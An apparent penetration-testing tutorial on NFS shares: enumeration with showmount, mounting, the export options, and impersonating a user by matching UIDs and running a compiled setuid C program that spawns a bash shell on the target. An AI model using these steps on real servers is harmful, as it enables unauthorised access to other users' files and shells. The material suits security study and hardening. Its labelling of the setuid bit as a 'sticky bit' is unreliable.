Network File System is a distributed file system protocol originally developed by Sun Microsystems in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed.
Enumeration
showmount gives us the opportunity to know which folder are available for us.
showmount -e <IP>
Mounting the folder
We can mount the folder with mount command.
mount -t nfs [-o vers=2] <IP>:<NFS_FOLDER> <LOCAL_FOLDER> -o nolock
Configuration
The file /etc/exports show the NFS configuration applied on the server.
$ cat /etc/exports
/var/nfsshare *(rw,sync,root_squash,no_all_squash)
/opt *(rw,sync,root_squash,no_all_squash
rw: Means that we can read and write any file on the share.root_squash(default): Maps all the requests from UID/GID 0 to the anonymous UID/GID.no_root_squash: All requests from UID/GID 0 are not mapped to the anonymous UID/GID.no_all_squash(default): Not map all the requests from other UID/GID to the anonymous UID/GID .
Note: If we have access to the server and a NFS share has this configuration, we can impersonate any user on the attack machine except for the root user.
Impersonate a User (No Root)
So what we’ll do is add the user frank (user to impersonate) on our kali machine and change his id to 1000 (Assigned on the target).
❯ useradd frank
❯ cat /etc/passwd | grep frank
frank:x:1000:1000::/home/frank:/bin/sh
Note: You can change any ID by modifying the
/etc/passwdfile.
Next step is create a setuid.c file:
#include <unistd.h>
int main()
{
setreuid(1000,1000);
execl("/bin/bash", "bash", (char *)NULL);
return 0;
}
Then compile it:
gcc setuid.c -o setuid
Set the sticky bit on the file:
chmod u+s setuid
And execute it on the target machine.